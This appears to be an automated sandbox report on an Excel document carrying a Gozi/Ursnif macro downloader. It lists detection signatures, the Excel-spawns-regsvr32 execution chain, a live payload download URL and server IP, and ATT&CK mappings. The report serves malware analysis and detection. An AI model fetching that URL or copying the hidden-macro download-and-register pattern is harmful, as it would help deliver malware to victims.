Loading ...

Play interactive tourEdit tour

Analysis Report document-1322008235.xls

Overview

General Information

Sample Name:document-1322008235.xls
Analysis ID:324300
MD5:59022091fba61b5021c8ab0c7c9b10e2
SHA1:18b016bd5694b3255dec5d3e45668c4b6d299154
SHA256:85a025f978905bee6b50f641abddb5a628702d90a6227b6c146ad4b8f096feeb
Tags:goziSilentBuilderursnifxls

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Allocates a big amount of memory (probably used for heap spraying)
Document contains embedded VBA macros
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2416 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 2396 cmdline: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
document-1322008235.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x4fea2:$s1: Excel
  • 0x50f1d:$s1: Excel
  • 0x389b:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
document-1322008235.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis: Data: Command: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll, CommandLine: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2416, ProcessCommandLine: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll, ProcessId: 2396

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: document-1322008235.xlsVirustotal: Detection: 36%Perma Link

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exeJump to behavior
    Source: excel.exeMemory has grown: Private usage: 4MB later: 45MB
    Source: global trafficDNS query: name: fu5on.com
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 67.212.179.162:443
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 67.212.179.162:443
    Source: Joe Sandbox ViewIP Address: 67.212.179.162 67.212.179.162
    Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
    Source: unknownDNS traffic detected: queries for: fu5on.com
    Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.0.drString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
    Source: 77EC63BDA74BD0D0E0426DC8F8008506.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
    Source: regsvr32.exe, 00000003.00000002.2110222677.0000000001E40000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
    Source: document-1322008235.xlsString found in binary or memory: https://fu5on.com/ds/231120.gif
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
    Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Content X I Al " "," jR " A B C D E F G H I J K L M N O P Q R S T : 1 2 3 4 5 6 7
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: document-1322008235.xlsInitial sample: CALL
    Source: document-1322008235.xlsInitial sample: CALL
    Source: document-1322008235.xlsInitial sample: CALL
    Source: document-1322008235.xlsInitial sample: CALL
    Source: document-1322008235.xlsInitial sample: EXEC
    Found obfuscated Excel 4.0 MacroShow sources
    Source: document-1322008235.xlsInitial sample: High usage of CHAR() function: 18
    Source: document-1322008235.xlsOLE indicator, VBA macros: true
    Source: document-1322008235.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
    Source: classification engineClassification label: mal80.expl.evad.winXLS@3/11@1/1
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\BDEE0000Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE30E.tmpJump to behavior
    Source: document-1322008235.xlsOLE indicator, Workbook stream: true
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: document-1322008235.xlsVirustotal: Detection: 36%
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dllJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: document-1322008235.xls, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting21Path InterceptionProcess Injection1Regsvr321OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsExtra Window Memory Injection1Masquerading1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonExtra Window Memory Injection1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    document-1322008235.xls37%VirustotalBrowse
    document-1322008235.xls14%MetadefenderBrowse
    document-1322008235.xls6%ReversingLabsDocument-Word.Trojan.Heuristic

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://fu5on.com/ds/231120.gif0%URL Reputationsafe
    https://fu5on.com/ds/231120.gif0%URL Reputationsafe
    https://fu5on.com/ds/231120.gif0%URL Reputationsafe
    http://servername/isapibackend.dll0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    fu5on.com
    67.212.179.162
    truefalse
      unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://fu5on.com/ds/231120.gifdocument-1322008235.xlsfalse
      • URL Reputation: safe
      • URL Reputation: safe
      • URL Reputation: safe
      unknown
      http://servername/isapibackend.dllregsvr32.exe, 00000003.00000002.2110222677.0000000001E40000.00000002.00000001.sdmpfalse
      • Avira URL Cloud: safe
      low

      Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public

      IPDomainCountryFlagASNASN NameMalicious
      67.212.179.162
      unknownUnited States
      32475SINGLEHOP-LLCUSfalse

      General Information

      Joe Sandbox Version:31.0.0 Red Diamond
      Analysis ID:324300
      Start date:29.11.2020
      Start time:04:05:25
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 4m 34s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:document-1322008235.xls
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of analysed new started processes analysed:5
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal80.expl.evad.winXLS@3/11@1/1
      EGA Information:Failed
      HDC Information:Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found application associated with file extension: .xls
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
      Warnings:
      Show All
      • Exclude process from analysis (whitelisted): dllhost.exe
      • Excluded IPs from analysis (whitelisted): 192.35.177.64, 8.248.117.254, 67.27.235.126, 67.26.73.254, 8.248.147.254, 8.248.131.254
      • Excluded domains from analysis (whitelisted): audownload.windowsupdate.nsatc.net, apps.digsigtrust.com, ctldl.windowsupdate.com, auto.au.download.windowsupdate.com.c.footprint.net, apps.identrust.com, au-bg-shim.trafficmanager.net
      • Report size getting too big, too many NtDeviceIoControlFile calls found.

      Simulations

      Behavior and APIs

      No simulations

      Joe Sandbox View / Context

      IPs

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      67.212.179.162document-1353534916.xlsGet hashmaliciousBrowse
        document-1353534916.xlsGet hashmaliciousBrowse
          document-1359580495.xlsGet hashmaliciousBrowse
            document-1359580495.xlsGet hashmaliciousBrowse
              document-135688950.xlsGet hashmaliciousBrowse
                document-135688950.xlsGet hashmaliciousBrowse
                  document-1363041939.xlsGet hashmaliciousBrowse
                    document-1363041939.xlsGet hashmaliciousBrowse
                      document-1353330392.xlsGet hashmaliciousBrowse
                        document-1353330392.xlsGet hashmaliciousBrowse
                          document-1353428775.xlsGet hashmaliciousBrowse
                            document-1353428775.xlsGet hashmaliciousBrowse
                              document-1365485901.xlsGet hashmaliciousBrowse
                                document-1363274030.xlsGet hashmaliciousBrowse
                                  document-1365485901.xlsGet hashmaliciousBrowse
                                    document-1363274030.xlsGet hashmaliciousBrowse
                                      document-1366355469.xlsGet hashmaliciousBrowse
                                        document-1366355469.xlsGet hashmaliciousBrowse
                                          document-1367992196.xlsGet hashmaliciousBrowse
                                            document-1367992196.xlsGet hashmaliciousBrowse

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              fu5on.comdocument-1353534916.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-1353534916.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-1359580495.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-1359580495.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-135688950.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-135688950.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-1363041939.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-1363041939.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-1353330392.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-1353330392.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-1353428775.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-1353428775.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-1365485901.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-1363274030.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-1365485901.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-1363274030.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-1366355469.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-1366355469.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-1367992196.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-1367992196.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162

                                              ASN

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              SINGLEHOP-LLCUSdocument-1353534916.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-1353534916.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-1359580495.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-1359580495.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-135688950.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-135688950.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-1363041939.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-1363041939.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-1353330392.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-1353330392.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-1353428775.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-1353428775.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-1365485901.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-1363274030.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-1365485901.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-1363274030.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-1366355469.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-1366355469.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-1367992196.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-1367992196.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              7dcce5b76c8b17472d024758970a406b2019-07-05-password-protected-Word-doc-with-macro-for-follow-up-malware.docGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-1353534916.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-1443146531.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-1359580495.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-135688950.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-1490425384.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-1453508098.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-1443646287.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-1452240368.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-1476538535.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-1363041939.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-1442977347.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-1353330392.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-1444203221.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-1353428775.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-1481025349.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-1448493973.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-1466544307.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-144037925.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162
                                              document-1489938345.xlsGet hashmaliciousBrowse
                                              • 67.212.179.162

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                              Category:dropped
                                              Size (bytes):58936
                                              Entropy (8bit):7.994797855729196
                                              Encrypted:true
                                              SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                              MD5:E4F1E21910443409E81E5B55DC8DE774
                                              SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                              SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                              SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):893
                                              Entropy (8bit):7.366016576663508
                                              Encrypted:false
                                              SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                                              MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                                              SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                                              SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                                              SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):326
                                              Entropy (8bit):3.1147363886328936
                                              Encrypted:false
                                              SSDEEP:6:kK90c3lswwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:73dkPlE99SNxAhUegeT2
                                              MD5:DD7A12717E027A6748131F1BE947EE3F
                                              SHA1:56AA27AC6584973497ABFA811473650C3B4C8A30
                                              SHA-256:8A986BB7DEF8167B5F137B734939A9E92D9708E1883CE76F670B5A5C823098A0
                                              SHA-512:C061314CE1249D7203E63524781FE2391810284EFA41EC6436122ACA4B5BA878A3B33094B64ACFC1D31D109EED7C020D6E7BBA5DBADECB45D817500F7B23241D
                                              Malicious:false
                                              Reputation:low
                                              Preview: p...... ..........m.G...(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...
                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):252
                                              Entropy (8bit):3.016586041921706
                                              Encrypted:false
                                              SSDEEP:3:kkFklKpzkNllXfllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpK:kKRdMlJliBAIdQZV7eAYLit
                                              MD5:00E5AC9069E2553BBDE2202112AD0A42
                                              SHA1:5C5D0F257EFB2F9299F8E806EC8090986FE6E85A
                                              SHA-256:542D5F5C74DCADDF4C6EB506880FCB064063FAF171B7DAFE166F733019AB582B
                                              SHA-512:540F7F79B10F3BC7713996F143B09CD270248AB90DB2F168BDB5376D7616891BC2158EC1FF9938F311557A07FB94C92AC971B199841158D041F2127F0A7673C6
                                              Malicious:false
                                              Reputation:low
                                              Preview: p...... ....`....r@.G...(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...
